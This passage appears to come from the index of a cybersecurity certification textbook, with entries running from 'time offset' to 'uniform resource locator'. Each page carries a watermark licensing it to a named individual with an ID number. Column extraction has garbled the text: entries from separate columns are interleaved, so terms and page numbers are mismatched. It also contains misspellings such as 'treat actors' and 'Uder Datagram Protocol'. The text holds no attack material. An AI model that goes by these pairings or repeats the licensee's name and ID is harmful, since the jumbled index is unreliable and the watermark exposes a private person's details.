Layer 7), 258 digital certificates, 130‑131 system integration, third-party
iptables, 258‑259 subject name attributes, 130‑131 risks, 54
state table, 257 subscriber identity module system memory acquisition
(SIM), 333 crash dump, 492
Index
LICENSED FOR USE ONLY BY: ATUL MALHOTRA · 8375311 · MAY 05 2022
I-40 | Index
Index
LICENSED FOR USE ONLY BY: ATUL MALHOTRA · 8375311 · MAY 05 2022
Index | I-41
time offset, 486 transit gateways, 424 true random number generator
time synchronization, 289 transparent proxy, 261‑262 (TRNG), 114‑115
timing attack, 414 Transport Control Protocol (TCP), trust anchor, 318‑319
TKIP (Temporal Key Integrity weak network configurations, 52 Trusted Automated eXchange of
Protocol), 237 transport encryption (data-in- Indicator Information (TAXII), 30
TLDs (Top Level Domains), 287 transit), 112 Trusted Computing Group
TLS. see Transport Layer Security transport layer (layer 4), 425 (TCG), 321
(TLS) transport layer (OSI Layer 4), Trusted Platform Module (TPM),
TLS VPN, 303‑304 257‑258 164‑165
token-based key card lock, 542 Transport Layer Security (TLS) trusted platform module (TPM),
tokenization, database application log files, 471 180, 318‑319
deidentification methods, 452 cipher suites, 108, 293 trust model, 127
token keys and static codes, secure application protocols, TTP. see tactics, techniques, and
167‑168 292‑294 procedures (TTP)
tokens, 180 secure wireless tunnel, 301
tombstone, 450 infrastructure, 241‑242 tunnel mode, 306
Top Level Domains (TLDs), Key SSL/TLS versions, 293‑294 turnstile, 543
Signing Key, 287 Transport Layer Security (TLS) VPN two-factor authentication (2FA),
Top-Level NTP servers Open VPN, 303‑304 151, 170
(stratum 1), 289 Point-to-Point Protocol two-person integrity/cpmtrp, 546
topologies, demilitarized zone (PPP), 304 two-step verification, 170
(DMZ) Point-to-Point Tunneling typosquatting, 79
screened hosts, 223 Protocol (PPTP), 303
screened subnet, 222
triple-homed firewall, 222‑223
Secure Sockets Tunneling U
Protocol (SSTP), 304
topology discovery U2F (Universal Second
SSL VPN, 303‑304
(footprinting), 36‑37 Factor), 168
transport mode, 306
TOR (The Onion Router), 25, 26 UAC (user account control),
transposition cipher, 98
TOTP (Time-Based One-Time 201‑202
trapdoor function, 101
Password Algorithm), 169 UAV (drones/unmanned aerial
treat actors, types of
TPM (Trusted Platform Module), vehicle), 69‑70
advanced persistent threats,
164‑165 Ubuntu Linux
20‑21, 21
TPM (trusted platform RedHat Linux container,
competitors, 21
module), 180 413‑414
criminal syndicates, 21
traceroute root accounts, 185
guidelines for, 33
network reconnaissance Uder Datagram Protocol (UDP)
hackers, 20
tools, 37 transport layer (OSI Layer 4),
hacker teams, 20
packet injection and 257
hacktivists, 20
replay, 44‑45 weak network configurations,
tracert, network reconnaissance insider threats, 21‑22
52
tools, 37 nation state actors, 21
UEBA. see user and entity
traffic analysis, 43‑44 script kiddies, 20
behavior analytics (UEBA)
training/policies, onboarding state actors, 20‑21, 21
UEM. see unified endpoint
policies, 181 treat intelligence, 459‑460
management (UEM)
training technique diversity trend analysis, 468
unauthorized requests, 381
capture the flag (CTF), triple-homed firewall, 222‑223
unformatted error messages,
210‑211 TRNG. see true random number
weak network configurations, 53
computer-based training and generator (TRNG)
unified endpoint management
gamification, 211 TRNG (true random number
(UEM), 345
phishing campaigns, 210 generator), 114‑115
unified extensible firmware
Transient Electromagnetic Trojans
interface (UEFI), 319
Pulse Emanation Standard defined, 82, 83
uniform resource locator (URL)
(TEMPEST), 550 static known treats, 19
Index
LICENSED FOR USE ONLY BY: ATUL MALHOTRA · 8375311 · MAY 05 2022
I-42 | Index
Index
LICENSED FOR USE ONLY BY: ATUL MALHOTRA · 8375311 · MAY 05 2022
Index | I-43
Index
LICENSED FOR USE ONLY BY: ATUL MALHOTRA · 8375311 · MAY 05 2022
I-44 | Index
Index
LICENSED FOR USE ONLY BY: ATUL MALHOTRA · 8375311 · MAY 05 2022